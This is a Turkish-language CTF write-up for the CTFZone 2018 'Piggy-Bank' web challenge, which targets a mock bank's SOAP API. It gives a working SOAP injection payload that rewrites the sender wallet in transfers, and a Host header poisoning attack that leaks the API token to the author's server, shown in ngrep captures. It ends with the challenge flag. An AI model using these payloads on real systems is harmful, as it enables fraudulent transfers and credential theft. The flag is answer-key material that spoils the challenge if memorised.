Piggy-Bank - CTFZone 2018

Piggy-Bank - CTFZone 2018

1
2
3
Hack some bank for me.

http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/home/

Link’e gittik ve karşımıza Piggy-Bank diye bir banka çıktı

Üye olduğumuz vakit For developers diye bir tab karşımıza çıktı. Ama daha aktif olmadığını bize söylüyordu.

Fakat kaynak kodunda

1
2
3
  <div class="tab tab_5">Especially for pig-developers, we have the coolest api, which they will soon be able to use!</div>
<!-- Link to the API (http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/api/bankservice.wsdl.php) (Testing stage) -->
</div>

Hemen WSDL sayfasına gittik. Böyle bir WSDL formu ile karşılatık.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

<?xml version="1.0" encoding="utf-8"?>
<wsdl:definitions name="Bank"
targetNamespace="urn:Bank"
xmlns:tns="urn:Bank"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns="http://schemas.xmlsoap.org/wsdl/">
<message name="BalanceRequest">
<part name="wallet_num" type="xsd:decimal"/>
</message>
<message name="BalanceResponse">
<part name="code" type="xsd:float"/>
<part name="status" type="xsd:string"/>
</message>
<message name="internalTransferRequest">
<part name="receiver_wallet_num" type="xsd:decimal"/>
<part name="sender_wallet_num" type="xsd:decimal"/>
<part name="amount" type="xsd:float"/>
<part name="token" type="xsd:string"/>
</message>
<message name="internalTransferResponse">
<part name="code" type="xsd:float"/>
<part name="status" type="xsd:string"/>
</message>
<portType name="BankServicePort">
<operation name="requestBalance">
<input message="tns:BalanceRequest"/>
<output message="tns:BalanceResponse"/>
</operation>
<operation name="internalTransfer">
<input message="tns:internalTransferRequest"/>
<output message="tns:internalTransferResponse"/>
</operation>
</portType>
<binding name="BankServiceBinding" type="tns:BankServicePort">
<soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
<operation name="requestBalance">
<soap:operation soapAction="urn:requestBalanceAction"/>
<input>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</input>
<output>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</output>
</operation>
<operation name="internalTransfer">
<soap:operation soapAction="urn:internalTransferAction"/>
<input>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</input>
<output>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</output>
</operation>
</binding>
<wsdl:service name="BankService">
<wsdl:port name="BankServicePort" binding="tns:BankServiceBinding">
<soap:address location="http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/api/bankservice.php" />
</wsdl:port>
</wsdl:service>
</wsdl:definitions>

Buna göre 2 adet SOAP API isteğimiz olduğunu öğrendik.

Birincisi bakiye sorgulama

1
2
3
4
5
6
7
8
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:Bank">
<soapenv:Header/>
<soapenv:Body>
<urn:requestBalance soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<wallet_num xsi:type="xsd:decimal">hesapNo</wallet_num>
</urn:requestBalance>
</soapenv:Body>
</soapenv:Envelope>

İkincisi ise bakiye yollama

1
2
3
4
5
6
7
8
9
10
11
 <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:Bank">
<soapenv:Header/>
<soapenv:Body>
<urn:internalTransfer soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<receiver_wallet_num xsi:type="xsd:decimal">aliciHesapNo</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">fonderenHesapNo</sender_wallet_num>
<amount xsi:type="xsd:float">miktar</amount>
<token xsi:type="xsd:string">token</token>
</urn:internalTransfer>
</soapenv:Body>
</soapenv:Envelope>

Bizim için gerekli olan şey para transferi fakat token koşulu var. Biraz daha API’yi inceledikten sonra sitedeki para transfer kısmını kurcalamaya karar verdik.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /home/transfer.php HTTP/1.1
Host: web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/home/transfer.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Cookie: PHPSESSID=xxx
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

receiver=1828&amount=123

Data kısmında receiver ve amount olması API‘yi çağırıştırdı. SQLi gibi SOAP injection deniyelim dedik.

Çözüm 1 SOAP injection

Böyle birşey yapalım diyip yola çıktık.

1
2
3
4
5
6
<receiver_wallet_num xsi:type="xsd:decimal">1828</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1</sender_wallet_num>
<amount xsi:type="xsd:float"><!--</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1000</sender_wallet_num>
<amount xsi:type="xsd:float">-->1000</amount>
<token xsi:type="xsd:string">token</token>

receiver kısmına

1
2
3
hesapNumaram </receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1</sender_wallet_num>
<amount xsi:type="xsd:float"><!--

amount kısmına ise

1
--> 200

Yazarsak injection yapmış oluruz dedik. Fakat para gelmedi derken farkettik ki bizden önce paraları başkası çalmıştır diyip. Basit bir betikle 1den 2000’e kadar tum hesaplar için çalıştırdık ve sonuç:

Çözüm 2 Host header poisoning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /home/transfer.php HTTP/1.1
Host: web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/home/transfer.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Cookie: PHPSESSID=xxx
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

receiver=1828&amount=123

İsteğinde Host Header İnjection olduğunu fark ettik. API’yi böylece TRACE edebilirdik

Host Header‘ini kendi hostumuz olarak set edip kendi sunucumuzda /api/bankservice.wsdl.php dosyasını oluşturduk

1
Host: cd0.me

portumuzu izlemeye başladık

1
ngrep -q -d ens160 -W byline port 80

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
root@cd0:~# ngrep -q -d ens160 -W byline port 80
interface: ens160 (x.x.x.x/255.255.255.224)
filter: (ip or ip6) and ( port 80 )

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [AP]
GET /api/bankservice.wsdl.php HTTP/1.1.
Host: cd0.me.
Connection: Keep-Alive.
Accept-Encoding: gzip.
CF-IPCountry: DE.
X-Forwarded-For: 18.184.147.62.
CF-RAY: 43ecd60df1ef63a3-FRA.
X-Forwarded-Proto: http.
CF-Visitor: {"scheme":"http"}.
CF-Connecting-IP: 18.184.147.62.
.


T my.ip.v4.addr:80 -> 162.158.89.120:10101 [A]
HTTP/1.1 200 OK.
Date: Mon, 23 Jul 2018 08:39:22 GMT.
Server: Apache/2.4.18 (Ubuntu).
Last-Modified: Mon, 23 Jul 2018 07:31:21 GMT.
ETag: "b5b-571a5a1ce14ac".
Accept-Ranges: bytes.
Content-Length: 2907.
Keep-Alive: timeout=5, max=100.
Connection: Keep-Alive.
.
<?xml version="1.0" encoding="utf-8"?><wsdl:definitions name="Bank"
targetNamespace="urn:Bank"
xmlns:tns="urn:Bank"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns="http://schemas.xmlsoap.org/wsdl/">

<message name="BalanceRequest">
<part name="wallet_num" type="xsd:decimal"/>
</message>

<message name="BalanceResponse">
<part name="code" type="xsd:float"/>
<part name="status" type="xsd:string"/>
</message>

<message name="internalTransferRequest">
<part name="receiver_wallet_num" type="xsd:decimal"/>
<part name="sender_wallet_num" type="xsd:decimal"/>
<part name="amount" type="xsd:float"/>
<part name="token" type="xsd:string"/>
</message>

<message name="internalTransferResponse">
<part name="code" type="xsd:float"/>
<part name="status" type="xsd:string"/>
</message>

<portType name="BankServicePort">
<operation name="requestBalance">
<input message="tns:BalanceRequest"/>
<output message="tns:BalanceResponse"/>
</operation>
<operation name="internalTransfer">
<input message="tns:internalTransferRequest"/>
<output message="tns:internalTransferResponse"/>
</operation>
</portType>

<binding name="BankServiceBinding" type="tns:BankServicePort">
<soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
<operation name="requestBalance">
<soap:operation soapAction="urn:requestBalanceAction"/>
<input>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</input>
<output>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</output>
</operation>
<operation name="internalTransfer">
<soap:operation soapAction="urn:internalTransferAction"/>
<input>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</input>
<output>
<soap:body use="encoded" namespace="urn:Bank" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
</output>
</operation>
</binding>

<wsdl:service name="BankSer

T my.ip.v4.addr:80 -> 162.158.89.120:10101 [AP]
vice">
<wsdl:port name="BankServicePort" binding="tns:BankServiceBinding">
<soap:address location="http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/api/bankservice.php" />
</wsdl:port>
</wsdl:service>
</wsdl:definitions>

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.252:15529 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.252:15529 -> my.ip.v4.addr:80 [AP]
POST /api/bankservice.php HTTP/1.1.
Host: cd0.me.
Connection: Keep-Alive.
Accept-Encoding: gzip.
CF-IPCountry: DE.
X-Forwarded-For: 18.184.147.62.
CF-RAY: 43ecd60eb012268a-FRA.
Content-Length: 736.
X-Forwarded-Proto: http.
CF-Visitor: {"scheme":"http"}.
User-Agent: PHP-SOAP/7.0.30-0ubuntu0.16.04.1.
Content-Type: application/soap+xml; charset=utf-8; action="internalTransferAction".
CF-Connecting-IP: 18.184.147.62.
.
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:Bank" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:internalTransfer>
<receiver_wallet_num xsi:type="xsd:decimal">1340</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1349</sender_wallet_num>
<amount xsi:type="xsd:float">1</amount>
<token xsi:type="xsd:token">somesupertokenkey1235555</token>
</ns1:internalTransfer>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

T my.ip.v4.addr:80 -> 162.158.89.252:15529 [AP]
HTTP/1.1 404 Not Found.
Date: Mon, 23 Jul 2018 08:39:22 GMT.
Server: Apache/2.4.18 (Ubuntu).
Content-Length: 289.
Keep-Alive: timeout=5, max=100.
Connection: Keep-Alive.
Content-Type: text/html; charset=iso-8859-1.
.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /api/bankservice.php was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at cd0.me Port 80</address>
</body></html>


T 162.158.89.252:15529 -> my.ip.v4.addr:80 [A]
......

T 162.158.89.120:10101 -> my.ip.v4.addr:80 [AF]
......

T 162.158.89.252:15529 -> my.ip.v4.addr:80 [AF]
1
2
3
4
5
6
7
8
9
10
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:Bank" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:internalTransfer>
<receiver_wallet_num xsi:type="xsd:decimal">1340</receiver_wallet_num>
<sender_wallet_num xsi:type="xsd:decimal">1349</sender_wallet_num>
<amount xsi:type="xsd:float">1</amount>
<token xsi:type="xsd:token">somesupertokenkey1235555</token>
</ns1:internalTransfer>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

token görüldüğü üzere sunucumuza geldi somesupertokenkey1235555 sornası yine basit bir betikle müşterilerin paralarını çalmak

ve flag

1
ctfzone{dcaa1f2047501ac0f4ae6f448082e63e}